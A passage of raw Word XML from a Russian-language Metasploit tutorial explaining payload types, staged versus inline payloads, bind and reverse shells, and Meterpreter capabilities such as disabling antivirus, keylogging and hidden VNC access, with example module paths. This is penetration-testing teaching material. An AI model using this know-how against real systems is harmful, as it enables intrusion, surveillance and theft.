    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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PassiveX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — использует технику </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ActiveX through Internet Explorer, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">чтобы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обходить фильтры исходящего трафика брандмауэром;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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NoNX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — вид payload для обхода </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DEP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Data Execution Prevention);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Ord</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — использует технику </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dll injection </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">для инъекции  в процесс;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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IPv6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — предназначен для работы в сетях IPv6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Reflective DLL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — инъекция payload в процесс, работающий в памяти </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Модули для Payload в MSF делятся на два класса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr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Inline (Non Staged)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Здесь эксплоит и шелл-код находятся в одном объекте. Полезен, если нет сетевого доступа к объекту — можно взять такой payload и запустить его на жертве. В этом случае отработает эксплоит и запустится шелл. Особенность — большой размер. Хранятся в каталоге </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/metasploit-framework/modules/payloads/singles. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Список для ОС Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121090" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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090" cy="93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24"/>
        </w:numPr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Staged payload.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Такой payload состоит из двух частей — </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Stager — это payload небольшого размера, задача которого — запуститься и загрузить большую часть (stage). Допустим, буфер памяти на жертве, полученный с привлечением эксплойта, слишком мал, чтобы запустить в нем </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inline payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. В этом случае в буфер памяти запускается сначала stager, который загружает более сложный код (stage).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно выбрать конкретный payload при помощи команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">и посмотреть в нем, к какому виду он относится: в этом поможет команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Считается, что staged payloads отделяются от ОС одним символом «/» в пути, но это соглашение работает не всегда.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1174115"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33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1741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133975" cy="1152525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34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152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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">С практической точки зрения важно, какие команды можно передавать в рамках полученного шелла. Поэтому условно рассмотрим виды шеллов в MSF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dqavvrq22fgv" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Виды shell и payload в MSF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Шелл состоит из клиентской (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) и серверной (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) части. Если говорить о </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> как технологии создания подключения, выделяют следующие виды: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0"/>
          <w:numId w:val="21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Blind shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — здесь</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускается на ПК жертвы и прослушивает порт, а клиент подключается к открытому порту. В теории считается, что </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bind shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно заблокировать брандмауэром, так как обычно на ПК жертвы фильтруется входящий трафик.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Reverse shell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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускается на ПК атакующего и прослушивает порт, а жертва, которая является клиентом, подключается к открытому порту на ПК атакующего. Считается, что </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> полезнее </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">для</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> злоумышленника, так как обычно на ПК жертвы фильтруется только входящий трафик, а исходящий порой целиком разрешается.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Оба шелла можно реализовать не только по протоколу </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, но и по </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, а также с использованием именованных каналов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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123940" cy="1930400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41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193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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотрим средства, которые используются при создании шелла. Иначе их принято называть оболочками.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">наиболее функциональная оболочка из всех видов payload. Пример модуля — </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload/windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это командная оболочка, которая помимо шелла может:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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проверить, не ВМ ли жертва — команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">checkvm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87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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собрать информацию — команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">winenum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88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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выполнить </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote desktop</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getgui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89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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отключить антивирус — команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">killav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8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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активировать </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">кейлоггер</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">keylogrecorder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8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Работу этой оболочки рассмотрим отдельно на практических примерах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vncinject</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все payload этого класса используются для скрытого доступа к удаленному рабочему столу при помощи протокола VNC. При этом на машине атакующего должен быть установлен VNC-клиент. Пример модуля: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload/windows/vncinject/reverse_tcp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8E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upexec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— позволяет загрузить выбранную оболочку и выполнить ее. При этом указывается путь к нужному файлу. Пример модуля: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload/windows/upexec/reverse_tcp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8F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Обычная командная оболочка </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— в качестве шелла используется командная оболочка, принятая для атакуемой ОС. Для Linux это </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">для Windows — </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пример модуля: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload/linux/x86/exec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90">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">При выборе </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> необходимо руководствоваться следующими критериями:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Вид payload (meterpreter, vncinjec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) определяет функционал оболочки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Технологию подключения (blind shell, reverse shell и т.п.) выбирают, исходя из возможных технических условий реализации атаки. Если сценарий атаки предполагает, что жертва загрузит оболочку по электронной почте, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">то </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">очевидно, что оболочка должна установить соединение с узлом злоумышленника. В этом случае выбирается </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
